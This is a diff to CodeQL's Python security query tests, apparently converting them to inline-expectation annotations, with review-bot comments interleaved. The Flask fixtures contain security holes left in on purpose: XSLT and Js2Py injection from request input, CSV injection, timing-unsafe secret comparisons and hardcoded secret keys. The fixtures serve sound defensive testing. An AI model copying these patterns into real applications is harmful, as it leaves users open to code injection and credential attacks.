| xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref index 4d432d461cab..5bde608133c6 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-091/XsltInjection.ql +query: experimental/Security/CWE-091/XsltInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py index 1655916c7e06..6464d35811bb 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py @@ -1,6 +1,6 @@ from lxml import etree from io import StringIO -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -11,4 +11,4 @@ def bad(): xslt_root = etree.XML(xsltQuery) f = StringIO('') tree = etree.parse(f) - result_tree = tree.xslt(xslt_root) # Not OK + result_tree = tree.xslt(xslt_root) # Not OK # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py index ddab954bbff8..9f8a25f2e616 100644 
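Review bot: In xslt.py the changed line now carries two markers, `# Not OK # $ Alert`. The old free-text label says nothing the expectation does not already say, and keeping both lets them drift apart when one is edited. I would write `result_tree = tree.xslt(xslt_root) # $ Alert`. The same applies to the five `# Not OK # $ Alert` lines in xsltInjection.py and the three `# bad # $ Alert` lines in csv_bad.py. The body of `bad()` begins above this hunk.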
--- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py @@ -1,6 +1,6 @@ from lxml import etree from io import StringIO -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -9,7 +9,7 @@ def a(): xsltQuery = request.args.get('xml', '') xslt_root = etree.XML(xsltQuery) - transform = etree.XSLT(xslt_root) # Not OK + transform = etree.XSLT(xslt_root) # Not OK # $ Alert @app.route("/xslt2") @@ -18,7 +18,7 @@ def b(): xslt_root = etree.XML(xsltQuery) f = StringIO('') tree = etree.parse(f) - result_tree = tree.xslt(xslt_root) # Not OK + result_tree = tree.xslt(xslt_root) # Not OK # $ Alert @app.route("/xslt3") @@ -28,7 +28,7 @@ def c(): f = StringIO('') tree = etree.parse(f) - result = tree.xslt(xslt_root, a="'A'") # Not OK + result = tree.xslt(xslt_root, a="'A'") # Not OK # $ Alert @app.route("/xslt4") def d(): @@ -37,7 +37,7 @@ def d(): f = StringIO('') tree = etree.parse(f) - result = tree.xslt(xslt_root, a="'A'") # Not OK + result = tree.xslt(xslt_root, a="'A'") # Not OK # $ Alert @app.route("/xslt5") def e(): @@ -47,7 +47,7 @@ def e(): f = StringIO('') tree = etree.parse(f) - result = tree.xslt(xslt_root, a="'A'") # Not OK + result = tree.xslt(xslt_root, a="'A'") # Not OK # $ Alert @app.route("/xslt6") diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected index 7798cdda143c..3fa27edd5211 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected 
@@ -1,3 +1,5 @@ +#select +| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | edges | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | provenance | | | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | provenance | AdditionalTaintStep | @@ -6,5 +8,3 @@ nodes | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | semmle.label | ControlFlowNode for Fstring | subpaths -#select -| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref index 457bfe2aacca..b88e9d7f392b 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-094/Js2Py.ql +query: experimental/Security/CWE-094/Js2Py.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py index f7aae16a9eed..d62cabef965c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py 
@@ -6,5 +6,5 @@ @bp.route("/bad") def bad(): - jk = flask.request.form["jk"] - jk = eval_js(f"{jk} f()") \ No newline at end of file + jk = flask.request.form["jk"] # $ Source + jk = eval_js(f"{jk} f()") # $ Alert \ No newline at end of file diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected index 5152f7353f25..aa90dfaeea0d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected @@ -1,3 +1,7 @@ +#select +| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | edges | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:9:19:9:25 | ControlFlowNode for request | provenance | | | csv_bad.py:9:19:9:25 | ControlFlowNode for request | csv_bad.py:16:16:16:22 | ControlFlowNode for request | provenance | | 
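Review bot: Js2PyTest.py still ends without a trailing newline, because the rewritten last line `jk = eval_js(f"{jk} f()") # $ Alert` is followed by `\ No newline at end of file` on the new side. The .qlref files touched by this patch gain their final newline, so ending this fixture with one as well would keep later diffs of it clean. The two annotations themselves agree with the single row in Js2Py.expected, which has the source at line 9 and the alert at line 10.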
@@ -26,7 +30,3 @@ nodes | csv_bad.py:24:16:24:38 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | semmle.label | ControlFlowNode for csv_data | subpaths -#select -| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref index d9cd7e9ca51c..6fe779d1b362 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-1236/CsvInjection.ql \ No newline at end of file +query: experimental/Security/CWE-1236/CsvInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py index 6e204d1f3c54..91ce60b928b0 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py 
+++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py @@ -6,7 +6,7 @@ import copy import csv from flask import Flask -from flask import request +from flask import request # $ Source from typing import List app = Flask(__name__) @@ -15,14 +15,14 @@ def bad1(): csv_data = request.args.get('csv') csvWriter = csv.writer(open("test.csv", "wt")) - csvWriter.writerow(csv_data) # bad - csvWriter.writerows(csv_data) # bad + csvWriter.writerow(csv_data) # bad # $ Alert + csvWriter.writerows(csv_data) # bad # $ Alert return "bad1" @app.route('/bad2') def bad2(): csv_data = request.args.get('csv') - csvWriter = csv.DictWriter(f, fieldnames=csv_data) # bad + csvWriter = csv.DictWriter(f, fieldnames=csv_data) # bad # $ Alert csvWriter.writeheader() return "bad2" diff --git a/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref b/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref index ee372b368404..710cbf1f46a5 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref @@ -1 +1 @@ -experimental/Security/CWE-176/UnicodeBypassValidation.ql +query: experimental/Security/CWE-176/UnicodeBypassValidation.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected index 1577182b2dcd..bd32259294e0 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected 
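Review bot: UnicodeBypassValidation.qlref is the only converted .qlref in this part of the patch that gets `query:` without a `postprocess:` line, so the CWE-176 test presumably keeps relying on its .expected file alone and has no inline expectations checked. If that is deliberate because the test sources carry no `# $ Alert` annotations yet, the commit description should say so. Otherwise add `postprocess: utils/test/InlineExpectationsTestQuery.ql` and annotate the test source as was done for the neighbouring directories.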
@@ -1,3 +1,6 @@ +#select +| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | +| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | 
@@ -9,6 +12,3 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths -#select -| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | -| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref index 73a8e6960ef8..5ac00932072c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.ql +query: experimental/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected index 0b7b2de8ddb9..0d3ebb1cf116 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected @@ -1,3 +1,4 @@ +#select edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | @@ -9,4 +10,3 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths -#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py index 1d312f028eba..c5084b78e802 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py 
@@ -23,18 +23,18 @@ def UnsafeCheckSignature(expected): message = b'To be signed' key = RSA.import_key(open('private_key.der').read()) h = SHA256.new(message) - signature = pkcs1_15.new(key).sign(h) - return expected == signature + signature = pkcs1_15.new(key).sign(h) # $ Source[py/possible-timing-attack-against-hash] + return expected == signature # $ Alert[py/possible-timing-attack-against-hash] def sign(pre_key, msg, alg): - return hmac.new(pre_key, msg, alg).digest() + return hmac.new(pre_key, msg, alg).digest() # $ Source[py/possible-timing-attack-against-hash] def verifyGood(msg, sig): return constant_time_string_compare(sig, sign(key, msg, hashlib.sha256)) #good def verifyBad(msg, sig): key = "e179017a-62b0-4996-8a38-e91aa9f1" - return sig == sign(key, msg, hashlib.sha256) #bad + return sig == sign(key, msg, hashlib.sha256) #bad # $ Alert[py/possible-timing-attack-against-hash] def constant_time_string_compare(a, b): if len(a) != len(b): diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref index 50c9d84b1f96..2829d76e85d2 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.ql +query: experimental/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
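Review bot: Every annotation added to TimingAttackAgainstHash.py is tagged `[py/possible-timing-attack-against-hash]`, yet TimingAttackAgainstHash.qlref also gains the inline-expectations postprocess and its .expected file keeps an empty `#select`. The second query therefore has no positive case in this directory, even though `verifyBad` compares a MAC with `==`. If that silence is a known gap rather than intended behaviour, record it on that line as `# $ MISSING: Alert[<id of TimingAttackAgainstHash.ql>]`; otherwise add a short comment saying the query is expected to report nothing here. `UnsafeCheckSignature` starts before the hunk and `constant_time_string_compare` continues after it.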
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py index 211c36274d74..591764ed4f89 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py @@ -11,7 +11,7 @@ @app.route('/bad') def bad(): - if not request.headers.get('X-Auth-Token') == "token": + if not request.headers.get('X-Auth-Token') == "token": # $ Alert raise Exception('bad token') return 'bad' diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected index 14c8b8bf1eb1..25e04cafb6f8 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected 
@@ -1,6 +1,6 @@ +#select +| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | edges nodes | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref index 9da35da9d6d2..0d31d85dc3f2 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.ql +query: experimental/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected index 80b074348966..b65708ca34e4 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected 
@@ -1,9 +1,9 @@ +#select +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | edges | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | provenance | | nodes | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths -#select -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. 
| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref index acfe13f6aad2..bd9d8272f981 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.ql +query: experimental/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py index a34b3b7c5ae5..4619821174ea 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py @@ -12,8 +12,8 @@ @app.route('/bad', methods = ['POST', 'GET']) def bad(): if request.method == 'POST': - password = request.form['pwd'] - return password == "1234" + password = request.form['pwd'] # $ Source + return password == "1234" # $ Alert @app.route('/good', methods = ['POST', 'GET']) def good(): 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected index 00c32be4267c..2054ba4a231d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected 
@@ -1,3 +1,13 @@ +#select +| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. 
| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | +| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | edges | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | 